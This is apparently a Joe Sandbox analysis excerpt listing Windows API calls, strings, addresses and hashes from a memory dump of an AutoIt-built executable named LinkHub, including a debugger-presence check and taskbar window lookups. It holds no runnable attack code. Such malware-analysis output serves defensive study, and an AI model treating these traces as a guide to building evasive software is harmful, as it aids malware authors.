Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 624084870-1403004172
                                                                                        APIs
                                                                                          • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
                                                                                          • Part of subcall function 002645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00264620
                                                                                        • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00262720
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 624084870-1403004172
                                                                                        APIs
                                                                                          • Part of subcall function 0020249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002024B0
                                                                                        • DefDlgProcW.USER32(?,0000002B,?,?,?), ref: 00299B6D
                                                                                          • Part of subcall function 00202234: GetWindowLongW.USER32(?,000000EB), ref: 00202242
                                                                                        • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00299B53
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: LongWindow$MessageProcSend
                                                                                        • String ID: (-
                                                                                        • API String ID: 982171247-4239615555
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 2<#$j3*
                                                                                        • API String ID: 0-310977406
                                                                                        APIs
                                                                                          • Part of subcall function 0020249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002024B0
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00298471
                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0029847F
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: LongWindow
                                                                                        • String ID: (-
                                                                                        • API String ID: 1378638983-4239615555
                                                                                        APIs
                                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0026146F
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Message
                                                                                        • String ID: AutoIt$Error allocating memory.
                                                                                        • API String ID: 2030045667-4017498283
                                                                                        APIs
                                                                                          • Part of subcall function 0021FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,002210E2,?,?,?,0020100A), ref: 0021FAD9
                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,0020100A), ref: 002210E6
                                                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0020100A), ref: 002210F5
                                                                                        Strings
                                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 002210F0
                                                                                        Similarity
                                                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                        • API String ID: 55579361-631824599
                                                                                        APIs
                                                                                        • __Init_thread_footer.LIBCMT ref: 0021F151
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Init_thread_footer
                                                                                        • String ID: `5-$h5-
                                                                                        • API String ID: 1385522511-4115059202
                                                                                        APIs
                                                                                        • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 002739F0
                                                                                        • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00273A05
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Temp$FileNamePath
                                                                                        • String ID: aut
                                                                                        • API String ID: 3285503233-3010740371
                                                                                        APIs
                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00292DC8
                                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00292DDB
                                                                                          • Part of subcall function 0026F292: Sleep.KERNEL32 ref: 0026F30A
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                        • String ID: Shell_TrayWnd
                                                                                        • API String ID: 529655941-2988720461
                                                                                        APIs
                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00292E08
                                                                                        • PostMessageW.USER32(00000000), ref: 00292E0F
                                                                                          • Part of subcall function 0026F292: Sleep.KERNEL32 ref: 0026F30A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                        • String ID: Shell_TrayWnd
                                                                                        • API String ID: 529655941-2988720461
                                                                                        • Opcode ID: a9bf569186c2c5106f977fd668f4518f159c753ef87471f9637c6f51e7f2262c
                                                                                        • Instruction ID: 969e0d512ca56fb7cb7c772df1474cd1ddbe79165f1bd1f449b4ca778efe15a7
                                                                                        • Opcode Fuzzy Hash: a9bf569186c2c5106f977fd668f4518f159c753ef87471f9637c6f51e7f2262c
                                                                                        • Instruction Fuzzy Hash: 27D0A9323D13007AE668A330BC0FFC26A149B00B00F5008267609AA0C0C8A068108A54
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0023C213
                                                                                        • GetLastError.KERNEL32 ref: 0023C221
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0023C27C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 1717984340-0
                                                                                        • Opcode ID: 45becf15627f7afa67db58ec96a64f403ce365a4fe97ba6ece09eeb58af5aac5
                                                                                        • Instruction ID: cf2d56109f93eab8fbf7432c96f3fcfab1b5f3e53efaac86ae93dc0b89f4def6
                                                                                        • Opcode Fuzzy Hash: 45becf15627f7afa67db58ec96a64f403ce365a4fe97ba6ece09eeb58af5aac5
                                                                                        • Instruction Fuzzy Hash: D741E7B1620216EFDB219FE4D848ABB77A5EF11710F35416AEC69B71A1DB708C20DB60